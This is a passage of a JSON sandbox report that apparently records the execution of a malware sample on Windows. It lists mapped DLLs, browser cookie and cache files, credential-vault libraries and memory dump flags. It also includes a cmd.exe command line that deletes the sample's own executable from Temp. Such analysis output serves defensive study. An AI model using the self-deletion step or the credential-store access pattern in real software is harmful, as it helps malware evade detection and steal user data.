"00:01:46.916", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 45056, "start_va": 1963589632, "type": "region", "version": 1 }, "end_va": 1963634687, "entry_point": 1963589632, "filename": "\\Windows\\System32\\profapi.dll", "id": "region_1769", "name": "profapi.dll", "norm_filename": "c:\\windows\\system32\\profapi.dll", "region_type": "memory_mapped_file", "start_va": 1963589632, "timestamp": "00:01:46.916", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 
5898240, "type": "region", "version": 1 }, "end_va": 5963775, "entry_point": 5898240, "filename": "\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\index.dat", "id": "region_1770", "name": "index.dat", "norm_filename": "c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\microsoft\\windows\\temporary internet files\\content.ie5\\index.dat", "region_type": "memory_mapped_file", "start_va": 5898240, "timestamp": "00:01:46.929", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 32768, "start_va": 5963776, "type": "region", "version": 1 }, "end_va": 5996543, "entry_point": 5963776, "filename": "\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\index.dat", "id": "region_1771", "name": "index.dat", "norm_filename": "c:\\users\\bgc6u8oy yxgxkr\\appdata\\roaming\\microsoft\\windows\\cookies\\index.dat", "region_type": "memory_mapped_file", "start_va": 5963776, "timestamp": "00:01:46.930", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 49152, "start_va": 6029312, "type": "region", "version": 1 }, "end_va": 6078463, "entry_point": 6029312, "filename": "\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\index.dat", "id": "region_1772", "name": "index.dat", "norm_filename": "c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\microsoft\\windows\\history\\history.ie5\\index.dat", "region_type": "memory_mapped_file", "start_va": 6029312, "timestamp": "00:01:46.930", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ 
"unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 135168, "start_va": 1937702912, "type": "region", "version": 1 }, "end_va": 1937838079, "entry_point": 1937702912, "filename": "\\Windows\\System32\\ntmarta.dll", "id": "region_1773", "name": "ntmarta.dll", "norm_filename": "c:\\windows\\system32\\ntmarta.dll", "region_type": "memory_mapped_file", "start_va": 1937702912, "timestamp": "00:01:46.930", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 282624, "start_va": 1994326016, "type": "region", "version": 1 }, "end_va": 1994608639, "entry_point": 1994326016, "filename": "\\Windows\\System32\\Wldap32.dll", "id": "region_1774", "name": "wldap32.dll", "norm_filename": "c:\\windows\\system32\\wldap32.dll", "region_type": "memory_mapped_file", "start_va": 1994326016, "timestamp": "00:01:46.930", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 32768, "start_va": 6094848, "type": "region", "version": 1 }, "end_va": 6127615, "entry_point": 6094848, "filename": "\\Windows\\System32\\en-US\\urlmon.dll.mui", "id": "region_1775", "name": "urlmon.dll.mui", "norm_filename": "c:\\windows\\system32\\en-us\\urlmon.dll.mui", "region_type": "memory_mapped_file", "start_va": 6094848, "timestamp": "00:01:46.947", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 6160384, "type": 
"region", "version": 1 }, "end_va": 6422527, "entry_point": 6160384, "filename": "\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\Microsoft\\Windows\\IETldCache\\index.dat", "id": "region_1776", "name": "index.dat", "norm_filename": "c:\\users\\bgc6u8oy yxgxkr\\appdata\\roaming\\microsoft\\windows\\ietldcache\\index.dat", "region_type": "memory_mapped_file", "start_va": 6160384, "timestamp": "00:01:46.947", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 43646976, "type": "region", "version": 1 }, "end_va": 44695551, "entry_point": 0, "filename": null, "id": "region_1777", "name": "private_0x00000000029a0000", "norm_filename": null, "region_type": "private_memory", "start_va": 43646976, "timestamp": "00:01:46.948", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1789952, "start_va": 1912602624, "type": "region", "version": 1 }, "end_va": 1914392575, "entry_point": 1912602624, "filename": "\\Program Files\\Mozilla Firefox\\nss3.dll", "id": "region_1778", "name": "nss3.dll", "norm_filename": "c:\\program files\\mozilla firefox\\nss3.dll", "region_type": "memory_mapped_file", "start_va": 1912602624, "timestamp": "00:01:47.020", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 204800, "start_va": 1850802176, "type": "region", "version": 1 }, "end_va": 1851006975, "entry_point": 1850802176, "filename": "\\Windows\\System32\\winmm.dll", "id": 
"region_1779", "name": "winmm.dll", "norm_filename": "c:\\windows\\system32\\winmm.dll", "region_type": "memory_mapped_file", "start_va": 1850802176, "timestamp": "00:01:47.190", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 28672, "start_va": 1915355136, "type": "region", "version": 1 }, "end_va": 1915383807, "entry_point": 1915355136, "filename": "\\Windows\\System32\\wsock32.dll", "id": "region_1780", "name": "wsock32.dll", "norm_filename": "c:\\windows\\system32\\wsock32.dll", "region_type": "memory_mapped_file", "start_va": 1915355136, "timestamp": "00:01:47.213", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 217088, "start_va": 1997340672, "type": "region", "version": 1 }, "end_va": 1997557759, "entry_point": 1997340672, "filename": "\\Windows\\System32\\ws2_32.dll", "id": "region_1781", "name": "ws2_32.dll", "norm_filename": "c:\\windows\\system32\\ws2_32.dll", "region_type": "memory_mapped_file", "start_va": 1997340672, "timestamp": "00:01:47.233", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 24576, "start_va": 1997078528, "type": "region", "version": 1 }, "end_va": 1997103103, "entry_point": 1997078528, "filename": "\\Windows\\System32\\nsi.dll", "id": "region_1782", "name": "nsi.dll", "norm_filename": "c:\\windows\\system32\\nsi.dll", "region_type": "memory_mapped_file", "start_va": 1997078528, "timestamp": "00:01:47.233", "type": "region", "version": 1 }, { "dump": { 
"filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 782336, "start_va": 1895497728, "type": "region", "version": 1 }, "end_va": 1896280063, "entry_point": 1895497728, "filename": "\\Windows\\System32\\msvcr100.dll", "id": "region_1783", "name": "msvcr100.dll", "norm_filename": "c:\\windows\\system32\\msvcr100.dll", "region_type": "memory_mapped_file", "start_va": 1895497728, "timestamp": "00:01:47.234", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 49152, "start_va": 1915355136, "type": "region", "version": 1 }, "end_va": 1915404287, "entry_point": 1915355136, "filename": "\\Windows\\System32\\vaultcli.dll", "id": "region_1784", "name": "vaultcli.dll", "norm_filename": "c:\\windows\\system32\\vaultcli.dll", "region_type": "memory_mapped_file", "start_va": 1915355136, "timestamp": "00:01:47.273", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1638400, "start_va": 1943470080, "type": "region", "version": 1 }, "end_va": 1945108479, "entry_point": 1943470080, "filename": "\\Windows\\winsxs\\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\\GdiPlus.dll", "id": "region_1785", "name": "gdiplus.dll", "norm_filename": "c:\\windows\\winsxs\\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\\gdiplus.dll", "region_type": "memory_mapped_file", "start_va": 1943470080, "timestamp": "00:01:47.848", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ 
"max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 917504, "start_va": 38600704, "type": "region", "version": 1 }, "end_va": 39518207, "entry_point": 0, "filename": null, "id": "region_1786", "name": "private_0x00000000024d0000", "norm_filename": null, "region_type": "private_memory", "start_va": 38600704, "timestamp": "00:01:47.891", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 2031616, "type": "region", "version": 1 }, "end_va": 2035711, "entry_point": 0, "filename": null, "id": "region_1787", "name": "private_0x00000000001f0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2031616, "timestamp": "00:01:47.893", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 7143424, "type": "region", "version": 1 }, "end_va": 7405567, "entry_point": 0, "filename": null, "id": "region_1788", "name": "private_0x00000000006d0000", "norm_filename": null, "region_type": "private_memory", "start_va": 7143424, "timestamp": "00:01:47.893", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 7405568, "type": "region", "version": 1 }, "end_va": 7667711, "entry_point": 0, "filename": 
null, "id": "region_1789", "name": "private_0x0000000000710000", "norm_filename": null, "region_type": "private_memory", "start_va": 7405568, "timestamp": "00:01:47.894", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 5185536, "start_va": 44695552, "type": "region", "version": 1 }, "end_va": 49881087, "entry_point": 0, "filename": null, "id": "region_1790", "name": "private_0x0000000002aa0000", "norm_filename": null, "region_type": "private_memory", "start_va": 44695552, "timestamp": "00:01:47.894", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 2147332096, "type": "region", "version": 1 }, "end_va": 2147336191, "entry_point": 0, "filename": null, "id": "region_1791", "name": "private_0x000000007ffdb000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147332096, "timestamp": "00:01:47.895", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1028096, "start_va": 1940520960, "type": "region", "version": 1 }, "end_va": 1941549055, "entry_point": 1940520960, "filename": "\\Windows\\System32\\WindowsCodecs.dll", "id": "region_1792", "name": "windowscodecs.dll", "norm_filename": "c:\\windows\\system32\\windowscodecs.dll", "region_type": "memory_mapped_file", "start_va": 1940520960, "timestamp": "00:01:47.925", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ 
"max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 4849664, "type": "region", "version": 1 }, "end_va": 4853759, "entry_point": 0, "filename": null, "id": "region_1793", "name": "private_0x00000000004a0000", "norm_filename": null, "region_type": "private_memory", "start_va": 4849664, "timestamp": "00:01:47.926", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 6422528, "type": "region", "version": 1 }, "end_va": 6426623, "entry_point": 0, "filename": null, "id": "region_1794", "name": "private_0x0000000000620000", "norm_filename": null, "region_type": "private_memory", "start_va": 6422528, "timestamp": "00:01:47.926", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 39518208, "type": "region", "version": 1 }, "end_va": 40566783, "entry_point": 0, "filename": null, "id": "region_1795", "name": "private_0x00000000025b0000", "norm_filename": null, "region_type": "private_memory", "start_va": 39518208, "timestamp": "00:01:47.928", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 38600704, "type": "region", "version": 1 }, "end_va": 39649279, "entry_point": 0, "filename": null, "id": "region_1796", "name": 
"private_0x00000000024d0000", "norm_filename": null, "region_type": "private_memory", "start_va": 38600704, "timestamp": "00:01:48.019", "type": "region", "version": 1 } ], "terminate_reason": "timeout", "type": "monitored_process", "unmonitor_reason": "terminated_by_timeout", "version": 1 }, { "cmd_line": "/c del \"C:\\Users\\BGC6U8~1\\AppData\\Local\\Temp\\lambdoidtegument.exe\"", "filename": "c:\\windows\\system32\\cmd.exe", "id": "proc_9", "image_name": "cmd.exe", "monitor_reason": "child_process", "monitored_id": 9, "origin_monitor_id": 8, "ref_parent_process": { "ref_id": "proc_8", "ref_source": "summary", "ref_type": "monitored_process", "type": "reference", "version": 1 }, "regions": [ { "dump": { "filename": "process_00000009-region_00001507-addr_0x0000000000010000-size_0x0000000000020000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_222", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 131072, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 196607, "entry_point": 0, "filename": null, "id": "region_1507", "name": "private_0x0000000000010000", "norm_filename": null, "region_type": "private_memory", "start_va": 65536, "timestamp": "00:01:11.141", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16384, "start_va": 196608, "type": "region", "version": 1 }, "end_va": 212991, "entry_point": 0, "filename": null, "id": "region_1508", "name": "pagefile_0x0000000000030000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 196608, "timestamp": "00:01:11.141", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ 
"pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 262144, "type": "region", "version": 1 }, "end_va": 266239, "entry_point": 0, "filename": null, "id": "region_1509", "name": "pagefile_0x0000000000040000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 262144, "timestamp": "00:01:11.141", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000009-region_00001510-addr_0x0000000000170000-size_0x0000000000100000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_223", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 1507328, "type": "region", "version": 1 }, "end_va": 2555903, "entry_point": 0, "filename": null, "id": "region_1510", "name": "private_0x0000000000170000", "norm_filename": null, "region_type": "private_memory", "start_va": 1507328, "timestamp": "00:01:11.141", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 311296, "start_va": 1244463104, "type": "region", "version": 1 }, "end_va": 1244774399, "entry_point": 1244463104, "filename": "\\Windows\\System32\\cmd.exe", "id": "region_1511", "name": "cmd.exe", "norm_filename": "c:\\windows\\system32\\cmd.exe", "region_type": "memory_mapped_file", "start_va": 1244463104, "timestamp": "00:01:11.141", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 
1294336, "start_va": 1995767808, "type": "region", "version": 1 }, "end_va": 1997062143, "entry_point": 1995767808, "filename": "\\Windows\\System32\\ntdll.dll", "id": "region_1512", "name": "ntdll.dll", "norm_filename": "c:\\windows\\system32\\ntdll.dll", "region_type": "memory_mapped_file", "start_va": 1995767808, "timestamp": "00:01:11.256", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 4096, "start_va": 1998127104, "type": "region", "version": 1 }, "end_va": 1998131199, "entry_point": 1998127104, "filename": "\\Windows\\System32\\apisetschema.dll", "id": "region_1513", "name": "apisetschema.dll", "norm_filename": "c:\\windows\\system32\\apisetschema.dll", "region_type": "memory_mapped_file", "start_va": 1998127104, "timestamp": "00:01:11.256", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 143360, "start_va": 2147155968, "type": "region", "version": 1 }, "end_va": 2147299327, "entry_point": 0, "filename": null, "id": "region_1514", "name": "pagefile_0x000000007ffb0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2147155968, "timestamp": "00:01:11.256", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000009-region_00001515-addr_0x000000007ffde000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_224", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2147344384, "type": "region", "version": 1 }, "end_va": 
2147348479, "entry_point": 0, "filename": null, "id": "region_1515", "name": "private_0x000000007ffde000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147344384, "timestamp": "00:01:11.256", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000009-region_00001516-addr_0x000000007ffdf000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_225", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2147348480, "type": "region", "version": 1 }, "end_va": 2147352575, "entry_point": 0, "filename": null, "id": "region_1516", "name": "private_0x000000007ffdf000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147348480, "timestamp": "00:01:11.256", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 131071, "entry_point": 0, "filename": null, "id": "region_1517", "name": "pagefile_0x0000000000010000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 65536, "timestamp": "00:01:11.279", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 131072, "type": "region", "version": 1 }, "end_va": 196607, "entry_point": 0, "filename": null, "id": "region_1518", "name": "pagefile_0x0000000000020000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 
131072, "timestamp": "00:01:11.279", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000009-region_00001519-addr_0x0000000000070000-size_0x0000000000100000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_226", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 458752, "type": "region", "version": 1 }, "end_va": 1507327, "entry_point": 0, "filename": null, "id": "region_1519", "name": "private_0x0000000000070000", "norm_filename": null, "region_type": "private_memory", "start_va": 458752, "timestamp": "00:01:11.279", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 421888, "start_va": 2555904, "type": "region", "version": 1 }, "end_va": 2977791, "entry_point": 2555904, "filename": "\\Windows\\System32\\locale.nls", "id": "region_1520", "name": "locale.nls", "norm_filename": "c:\\windows\\system32\\locale.nls", "region_type": "memory_mapped_file", "start_va": 2555904, "timestamp": "00:01:11.279", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000009-region_00001521-addr_0x0000000000300000-size_0x0000000000010000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_227", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 3145728, "type": "region", "version": 1 }, "end_va": 3211263, "entry_point": 0, "filename": null, "id": "region_1521", "name": "private_0x0000000000300000", "norm_filename": null, "region_type": "private_memory", "start_va": 3145728, "timestamp": "00:01:11.280", "type": "region", "version": 1 }, { "dump": { "filename": 
"", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 28672, "start_va": 1863974912, "type": "region", "version": 1 }, "end_va": 1864003583, "entry_point": 1863974912, "filename": "\\Windows\\System32\\winbrand.dll", "id": "region_1522", "name": "winbrand.dll", "norm_filename": "c:\\windows\\system32\\winbrand.dll", "region_type": "memory_mapped_file", "start_va": 1863974912, "timestamp": "00:01:11.280", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 303104, "start_va": 1965424640, "type": "region", "version": 1 }, "end_va": 1965727743, "entry_point": 1965424640, "filename": "\\Windows\\System32\\KernelBase.dll", "id": "region_1523", "name": "kernelbase.dll", "norm_filename": "c:\\windows\\system32\\kernelbase.dll", "region_type": "memory_mapped_file", "start_va": 1965424640, "timestamp": "00:01:11.281", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 40960, "start_va": 1984299008, "type": "region", "version": 1 }, "end_va": 1984339967, "entry_point": 1984299008, "filename": "\\Windows\\System32\\lpk.dll", "id": "region_1524", "name": "lpk.dll", "norm_filename": "c:\\windows\\system32\\lpk.dll", "region_type": "memory_mapped_file", "start_va": 1984299008, "timestamp": "00:01:11.281", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 319488, "start_va": 
1985806336, "type": "region", "version": 1 }, "end_va": 1986125823, "entry_point": 1985806336, "filename": "\\Windows\\System32\\gdi32.dll", "id": "region_1525", "name": "gdi32.dll", "norm_filename": "c:\\windows\\system32\\gdi32.dll", "region_type": "memory_mapped_file", "start_va": 1985806336, "timestamp": "00:01:11.281", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 823296, "start_va": 1986134016, "type": "region", "version": 1 }, "end_va": 1986957311, "entry_point": 1986134016, "filename": "\\Windows\\System32\\user32.dll", "id": "region_1526", "name": "user32.dll", "norm_filename": "c:\\windows\\system32\\user32.dll", "region_type": "memory_mapped_file", "start_va": 1986134016, "timestamp": "00:01:11.281", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 643072, "start_va": 1988427776, "type": "region", "version": 1 }, "end_va": 1989070847, "entry_point": 1988427776, "filename": "\\Windows\\System32\\usp10.dll", "id": "region_1527", "name": "usp10.dll", "norm_filename": "c:\\windows\\system32\\usp10.dll", "region_type": "memory_mapped_file", "start_va": 1988427776, "timestamp": "00:01:11.281", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 868352, "start_va": 1992359936, "type": "region", "version": 1 }, "end_va": 1993228287, "entry_point": 1992359936, "filename": "\\Windows\\System32\\kernel32.dll", "id": "region_1528", "name": "kernel32.dll", "norm_filename": 
"c:\\windows\\system32\\kernel32.dll", "region_type": "memory_mapped_file", "start_va": 1992359936, "timestamp": "00:01:11.281", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 704512, "start_va": 1994653696, "type": "region", "version": 1 }, "end_va": 1995358207, "entry_point": 1994653696, "filename": "\\Windows\\System32\\msvcrt.dll", "id": "region_1529", "name": "msvcrt.dll", "norm_filename": "c:\\windows\\system32\\msvcrt.dll", "region_type": "memory_mapped_file", "start_va": 1994653696, "timestamp": "00:01:11.281", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1048576, "start_va": 2137980928, "type": "region", "version": 1 }, "end_va": 2139029503, "entry_point": 0, "filename": null, "id": "region_1530", "name": "pagefile_0x000000007f6f0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2137980928, "timestamp": "00:01:11.281", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 819200, "start_va": 3211264, "type": "region", "version": 1 }, "end_va": 4030463, "entry_point": 0, "filename": null, "id": "region_1531", "name": "pagefile_0x0000000000310000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 3211264, "timestamp": "00:01:11.284", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not 
monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 126976, "start_va": 1984364544, "type": "region", "version": 1 }, "end_va": 1984491519, "entry_point": 1984364544, "filename": "\\Windows\\System32\\imm32.dll", "id": "region_1532", "name": "imm32.dll", "norm_filename": "c:\\windows\\system32\\imm32.dll", "region_type": "memory_mapped_file", "start_va": 1984364544, "timestamp": "00:01:11.284", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 835584, "start_va": 1991507968, "type": "region", "version": 1 }, "end_va": 1992343551, "entry_point": 1991507968, "filename": "\\Windows\\System32\\msctf.dll", "id": "region_1533", "name": "msctf.dll", "norm_filename": "c:\\windows\\system32\\msctf.dll", "region_type": "memory_mapped_file", "start_va": 1991507968, "timestamp": "00:01:11.284", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 28672, "start_va": 327680, "type": "region", "version": 1 }, "end_va": 356351, "entry_point": 0, "filename": null, "id": "region_1534", "name": "pagefile_0x0000000000050000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 327680, "timestamp": "00:01:11.305", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled 